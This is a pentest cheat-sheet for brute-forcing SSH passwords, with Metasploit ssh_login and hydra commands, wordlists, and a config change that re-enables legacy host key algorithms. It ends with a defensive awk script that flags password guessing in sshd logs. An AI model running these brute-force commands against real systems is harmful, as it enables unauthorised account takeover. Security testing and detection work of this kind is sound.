brutalize ssh

assuming password-based auth for once - see brute-ssh-known-privkey if you found some keys

requirements

target=x.x.x.x
ping -c1 $target
nmap -p 22 $target

with msf

ideally you have a user name or a user DB to target. this is just an example against root

use auxiliary/scanner/ssh/ssh_login
show options
set RHOSTS x.x.x.x
set STOP_ON_SUCCESS true
set THREADS 100
set USERNAME root
set PASS_FILE /var/tmp/rockyou.txt
run

with hydra

check that the ssh client is able to negotiate with the server

ssh $target -l admin
^C

fix things up if needed

vi ~/.ssh/config

host x.x.x*
        # ssh_config keeps the first value it reads for a keyword, so list both on one line
        hostkeyalgorithms +ssh-rsa,ssh-dss

and proceed

userlist=/usr/share/wordlists/ssh-users.txt

passwordlist=/usr/share/wordlists/ssh-passwords.txt
# alternative list (this later assignment overrides the one above)
passwordlist=/usr/share/wordlists/russkiwlst_top_100k.lst

sudo apt install hydra
grep ^proc /proc/cpuinfo
time hydra -4f -e nsr -t 8 \
    -L $userlist -P $passwordlist ssh://$target
    # -V

and if you know some specific login or password

# -l LOGIN
# -p PASSWORD
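
what a run like the ones above looks like from the server side: an added example, not part of the original page, that counts failed sshd password attempts per source and marks a source whose guessing ended in an accepted login. the function names, the default threshold and the log lines are assumptions made up for the example.

```shell
#!/bin/sh
# added example, not from the original page: spot ssh password guessing in
# sshd syslog lines. function names and the threshold are assumptions.

# constructed sample log (documentation-range addresses)
sample_auth_log() {
    cat <<'EOF'
Mar  3 10:15:01 bastion sshd[2101]: Failed password for root from 203.0.113.7 port 40022 ssh2
Mar  3 10:15:01 bastion sshd[2102]: Failed password for root from 203.0.113.7 port 40024 ssh2
Mar  3 10:15:02 bastion sshd[2103]: Failed password for invalid user admin from 203.0.113.7 port 40026 ssh2
Mar  3 10:15:02 bastion sshd[2104]: Failed password for invalid user admin from 203.0.113.7 port 40028 ssh2
Mar  3 10:15:03 bastion sshd[2105]: Failed password for root from 203.0.113.7 port 40030 ssh2
Mar  3 10:15:04 bastion sshd[2106]: Accepted password for root from 203.0.113.7 port 40032 ssh2
Mar  3 10:20:11 bastion sshd[2150]: Failed password for alice from 198.51.100.9 port 51800 ssh2
Mar  3 10:20:19 bastion sshd[2150]: Accepted password for alice from 198.51.100.9 port 51800 ssh2
EOF
}

# usage: detect_ssh_bruteforce [THRESHOLD] < logfile
# prints "<ip> failures=N users=N" for each source at or above THRESHOLD,
# plus SUCCESS_AFTER_FAILURES=<user> when a password was then accepted
detect_ssh_bruteforce() {
    awk -v threshold="${1:-5}" '
    # both line types end in: for [invalid user] NAME from IP port N ssh2
    /sshd/ && NF >= 6 && $(NF-4) == "from" && $(NF-2) == "port" {
        ip = $(NF-3); user = $(NF-5)
        if ($0 ~ /Failed password for /) {
            fails[ip]++
            if (!((ip, user) in seen)) { seen[ip, user] = 1; users[ip]++ }
        } else if ($0 ~ /Accepted password for / && (ip in fails) && fails[ip] >= threshold) {
            hit[ip] = user   # guessing run ended in a valid login
        }
    }
    END {
        for (ip in fails)
            if (fails[ip] >= threshold)
                printf "%s failures=%d users=%d%s\n", ip, fails[ip], users[ip],
                    ((ip in hit) ? " SUCCESS_AFTER_FAILURES=" hit[ip] : "")
    }' | sort
}

sample_auth_log | detect_ssh_bruteforce 5
```

on a host where sshd logs through syslog, feed it the real file, for example `detect_ssh_bruteforce 10 < /var/log/auth.log`. counts cover the whole input, so cut the log down to the time window of interest first.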

Copyright © 2024 Pierre-Philipp Braun